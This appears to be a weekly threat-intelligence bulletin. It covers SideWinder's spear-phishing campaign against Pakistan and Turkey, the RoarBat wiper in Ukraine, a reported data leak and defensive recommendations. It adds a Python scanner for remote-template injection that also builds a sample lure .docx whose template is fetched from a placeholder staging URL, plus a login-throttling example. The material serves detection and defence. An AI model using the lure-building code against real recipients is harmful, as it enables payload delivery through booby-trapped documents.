Published On : 2023-05-12
Weekly Attack Type and Trends
Key Intelligence Signals:
- Attack Type: Malware Implants, Spear Phishing, Ransomware Attacks, Vulnerabilities & Exploits, Data Leak.
- Objective: Unauthorized Access, Data Theft, Data Encryption, Financial Gains, Payload Delivery, Espionage, and Data Destruction.
- Business Impact: Data Loss, Financial Loss, Reputational Damage, Loss of Intellectual Property, Operational Disruption.
- Ransomware – LockBit 3.0 Ransomware | Malware – FLUHORSE
- LockBit 3.0 Ransomware – A ransomware-as-a-service (RaaS) operation whose affiliates encrypt and exfiltrate victim data for extortion.
- Please refer to the trending malware advisory for details on the following:
- Malware – FLUHORSE
- Behavior – Most of these malware families use phishing and social engineering as their initial attack vector. Beyond these techniques, exploitation of vulnerabilities, defence evasion, and persistence tactics are also observed.
Threat Actor in Focus
Indian APT SideWinder Targets Pakistan Alongside Turkey
- Suspected Threat Actors: SideWinder
- Attack Type: Spear Phishing
- Target Geography: Pakistan and Turkey
- Target Industry: Government
- Objective: Data Theft and Espionage
- Target Technology: Windows
- Business Impact: Data Loss and Operational Disruption
Summary:
Researchers recently detected a campaign, active since November 2022, conducted by APT SideWinder. The group, also tracked as Rattlesnake and T-APT4, is assessed to be India-based and has been operating since 2012. It commonly targets government entities, and for a decade Pakistan has remained its primary target. In this campaign the threat actor used server-side polymorphism to deliver the second-stage payload: the staging server generates a uniquely mutated copy of the payload for each request, which undermines traditional signature-based antivirus detection.

The campaign began in late November 2022 with spear-phishing emails carrying malicious documents themed around the interests of the Pakistani government. One attachment was titled “GUIDELINES FOR BEACON JOURNAL – 2023 PAKISTAN NAVY WAR COLLEGE (PNWC)”; another, named “PK_P_GAA_A1_Offerred.docx”, was dropped in early December 2022. This eight-page document masquerades as a letter of offer and acceptance for defense articles and services. Notably, none of the documents relied on embedded malicious macros to deliver the next stage. Instead, SideWinder used remote template injection (tracked in the original research as CVE-2017-0199), so that the document fetches its payload from an attacker-controlled server when opened. While the staging server was live, the group configured it so that anyone entering the malicious URL directly into a browser was redirected to the legitimate Pakistan Navy homepage, hiding the infrastructure from casual inspection. In early March, a new document distributed through phishing emails surfaced; this OLE document contained the address of the malicious server and was configured to target victims in Turkey.
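Because the lures above carry no macros, the thing to triage is the package relationship that makes Word reach out to a remote server when the file opens. The script below is an added example written for this report (not code from the researchers or from the threat actor): it builds a constructed, minimal .docx in memory, once with a remote attachedTemplate relationship and once without, and walks every `.rels` part looking for external attachedTemplate or oleObject targets with a network scheme. The staging URL `http://example.invalid/stage2.dotm` is a hypothetical placeholder, not SideWinder infrastructure.

```python
"""Scan a .docx for remote-template injection (no macros needed).

Added example for this report; not code from the original research or from any
vendor. A .docx is a ZIP of XML parts. Word fetches an external template at open
time when word/_rels/settings.xml.rels carries an attachedTemplate relationship
whose TargetMode is "External" and whose Target is a URL, which is the lure
mechanism described above. Triage therefore only has to walk the .rels parts.
"""
import io
import re
import zipfile
import xml.etree.ElementTree as ET  # use defusedxml in production against XML bombs

PKG_REL_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
OFFICE_REL = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/"

# Relationship types that make Word fetch content from the Target on open.
REMOTE_FETCH_TYPES = {
    OFFICE_REL + "attachedTemplate": "attachedTemplate",  # remote template injection
    OFFICE_REL + "oleObject": "oleObject",                # external OLE link
}
REMOTE_SCHEME = re.compile(r"^(https?|file|ftp)://", re.I)


def find_remote_fetches(docx_bytes):
    """Return (rels_part, relationship_kind, target_url) for every external
    attachedTemplate/oleObject relationship with a network scheme in the package.
    Local template paths (e.g. Normal.dotm) are deliberately not flagged."""
    hits = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as zf:
        for name in zf.namelist():
            if not name.endswith(".rels"):
                continue
            root = ET.fromstring(zf.read(name))
            for rel in root.iter("{%s}Relationship" % PKG_REL_NS):
                kind = REMOTE_FETCH_TYPES.get(rel.get("Type", ""))
                target = rel.get("Target", "")
                if kind and rel.get("TargetMode") == "External" and REMOTE_SCHEME.match(target):
                    hits.append((name, kind, target))
    return hits


def build_constructed_docx(template_url=None):
    """Build a minimal .docx in memory. With template_url set it carries an
    attachedTemplate relationship the way a lure would; with None it is benign.
    Constructed sample for the demo, not a real SideWinder document."""
    content_types = (
        '<?xml version="1.0" encoding="UTF-8"?>'
        '<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types">'
        '<Default Extension="rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>'
        '<Default Extension="xml" ContentType="application/xml"/>'
        '<Override PartName="/word/document.xml" ContentType="application/vnd.openxmlformats-officedocument.wordprocessingml.document.main+xml"/>'
        '<Override PartName="/word/settings.xml" ContentType="application/vnd.openxmlformats-officedocument.wordprocessingml.settings+xml"/>'
        '</Types>'
    )
    w_ns = "http://schemas.openxmlformats.org/wordprocessingml/2006/main"
    r_ns = OFFICE_REL.rstrip("/")
    document = f'<w:document xmlns:w="{w_ns}"><w:body><w:p><w:r><w:t>Decoy text</w:t></w:r></w:p></w:body></w:document>'
    settings = f'<w:settings xmlns:w="{w_ns}" xmlns:r="{r_ns}">'
    settings_rels = f'<Relationships xmlns="{PKG_REL_NS}">'
    if template_url:
        settings += '<w:attachedTemplate r:id="rId1"/>'
        settings_rels += (f'<Relationship Id="rId1" Type="{OFFICE_REL}attachedTemplate" '
                          f'Target="{template_url}" TargetMode="External"/>')
    settings += '</w:settings>'
    settings_rels += '</Relationships>'
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("[Content_Types].xml", content_types)
        zf.writestr("word/document.xml", document)
        zf.writestr("word/settings.xml", settings)
        zf.writestr("word/_rels/settings.xml.rels", settings_rels)
    return buf.getvalue()


if __name__ == "__main__":
    # Hypothetical staging URL; real SideWinder infrastructure is not reproduced here.
    lure = build_constructed_docx("http://example.invalid/stage2.dotm")
    for part, kind, url in find_remote_fetches(lure):
        print(f"REMOTE FETCH: {kind} in {part} -> {url}")
    print("benign hits:", find_remote_fetches(build_constructed_docx()))
```

Two caveats for use in a mail gateway or sandbox: the flagged URL is exactly what the server-side polymorphism and the browser redirect described above are designed to protect, so fetch it only from an isolated analysis network, and legacy binary `.doc`/`.rtf` lures store the link in OLE streams rather than in `.rels` parts and need a different parser (for example oletools).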
Insights:
Server-side polymorphism is a long-established technique used by a small number of Advanced Persistent Threat groups: because each victim receives a differently built copy of the payload, static signatures rarely match, reducing the risk of antivirus detection. APT Cloud Atlas employed the same technique in a campaign in 2019.
Major Geopolitical Developments in Cybersecurity
Wipers appear in Ukraine again
The Ukrainian agency CERT-UA warns that the threat group UAC-0165, almost certainly of Russian origin and very likely a subgroup of Sandworm (a unit of Russian military intelligence), has deployed the RoarBat wiper against networks in Ukraine. As a result, the operation of servers, user workstations, and data storage systems was disrupted across a range of government and private organizations.
A similar attack was claimed earlier this year against the national Ukrainian news service by the nominally hacktivist group “CyberArmyofRussia_Reborn”. CERT-UA points out that organizations can protect themselves against RoarBat by implementing basic tactical recommendations, similar to those CYFIRMA issues to its clients. The attack succeeded because multi-factor authentication was not enforced on remote VPN connections, and because the network lacked segmentation and filtering of incoming, outgoing, and inter-segment traffic.
Other Observations
The CYFIRMA Research team observed a potential data leak related to E3 Techno Limited (www[.]e3techno[.]com). E3 Techno Limited is a privately held company based in Bangladesh that develops software solutions for web, Android, and iOS platforms. The leaked data reportedly includes confidential customer information.
Source: Underground forums
STRATEGIC RECOMMENDATION
- Organizations should adopt Attack Surface Management, creating a continuous closed-loop process between attack surface monitoring and security testing.
- Deploy a unified threat management strategy – including malware detection, deep learning neural networks, and anti-exploit technology – combined with vulnerability and risk mitigation processes.
- Incorporate Digital Risk Protection (DRP) in the overall security posture that acts as a proactive defence against external threats targeting unsuspecting customers.
- Implement a holistic security strategy that includes controls for attack surface reduction, effective patch management, and active network monitoring through next-generation security solutions, backed by a ready-to-go incident response plan.
- Create risk-based vulnerability management with deep knowledge about each asset. Assign a triaged risk score based on the type of vulnerability and criticality of the asset to help ensure that the most severe and dangerous vulnerabilities are dealt with first.
MANAGEMENT RECOMMENDATION
- Take advantage of global Cyber Intelligence providing valuable insights on threat actor activity, detection, and mitigation techniques.
- Proactively monitor the effectiveness of the risk-based information security strategy, the security controls applied, and the proper implementation of security technologies, followed by corrective actions, remediation, and lessons learned.
- Move beyond the traditional model of security awareness towards improved simulation and training exercises that mimic real attack scenarios, account for the behaviours that lead to a compromise, and are measured against the real attacks the organization receives.
- Consider implementing Network Traffic Analysis (NTA) and Network Detection and Response (NDR) security systems to compensate for the shortcoming of EDR and SIEM solutions.
- Test detection processes to ensure awareness of anomalous events, communicate anomalies in a timely manner, and continuously evolve them to keep pace with refined ransomware threats.
TACTICAL RECOMMENDATION
- Patch software and applications as soon as updates are available. Where feasible, deploy automated remediation, since unpatched vulnerabilities are one of the top attack vectors.
- Consider using security automation to speed up threat detection, improve incident response, increase the visibility of security metrics, and accelerate execution of security checklists.
- Build and undertake safeguarding measures by monitoring and blocking the IOCs, and strengthen defences based on the tactical intelligence provided.
- Deploy behavioural anomaly-based detection technologies to detect ransomware attacks early and enable an appropriate response.
- Implement a combination of security controls such as reCAPTCHA (Completely Automated Public Turing test to tell Computers and Humans Apart), device fingerprinting, IP blacklisting, rate-limiting, and account lockout to thwart automated brute-force attacks.
- Ensure email and web content filtering uses real-time blocklists, reputation services, and other similar mechanisms to avoid accepting content from known and potentially malicious sources.
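The rate-limiting and account-lockout controls recommended above are easy to name and easy to get wrong, so here is an added worked example (written for this report, not taken from any vendor or product) of how they combine: a per-source-IP sliding window is checked first, so an attacker cannot probe lock state without spending requests, and a per-account temporary lockout follows after a run of failures. All thresholds and the injectable clock are illustrative assumptions; `password_ok` stands in for the result of a constant-time credential check.

```python
"""Brute-force throttling: per-IP sliding-window rate limit plus per-account lockout.

Added example; not from the report or any product. Thresholds (10 requests per
minute per IP, 5 failures -> 15-minute lock) are illustrative assumptions.
"""
import time
from collections import defaultdict, deque


class LoginGuard:
    def __init__(self, ip_limit=10, ip_window=60, lock_after=5, lock_seconds=900,
                 clock=time.monotonic):
        self.ip_limit, self.ip_window = ip_limit, ip_window
        self.lock_after, self.lock_seconds = lock_after, lock_seconds
        self.clock = clock                      # injectable for deterministic tests
        self._ip_hits = defaultdict(deque)      # ip -> timestamps inside the window
        self._failures = defaultdict(int)       # username -> consecutive failures
        self._locked_until = {}                 # username -> monotonic deadline

    def _rate_limited(self, ip):
        """Sliding window: drop timestamps older than ip_window, then count."""
        now = self.clock()
        hits = self._ip_hits[ip]
        while hits and now - hits[0] >= self.ip_window:
            hits.popleft()
        if len(hits) >= self.ip_limit:
            return True
        hits.append(now)
        return False

    def attempt(self, ip, username, password_ok):
        """Return one of: rate_limited, locked, failed, ok.

        The IP window is charged before the lock check so a locked account
        still costs the caller requests. While locked, even a correct password
        is rejected; otherwise the attacker learns the moment the guess lands.
        """
        now = self.clock()
        if self._rate_limited(ip):
            return "rate_limited"
        deadline = self._locked_until.get(username)
        if deadline is not None and now < deadline:
            return "locked"
        if password_ok:
            self._failures[username] = 0
            return "ok"
        self._failures[username] += 1
        if self._failures[username] >= self.lock_after:
            self._locked_until[username] = now + self.lock_seconds
            self._failures[username] = 0
            return "locked"
        return "failed"


if __name__ == "__main__":
    guard = LoginGuard(ip_limit=3, ip_window=60, lock_after=2, lock_seconds=300)
    for pw_ok in (False, False, True, True):   # constructed attempt sequence
        print(guard.attempt("203.0.113.5", "alice", pw_ok))
```

Two design notes: the HTTP layer should return the same generic message for `failed`, `locked` and `rate_limited` (the distinct return values are for logging and alerting, not for the client), and lockout is itself a denial-of-service lever, which is why the lock is temporary and why the IP window, not the account lock, is the first line of defence.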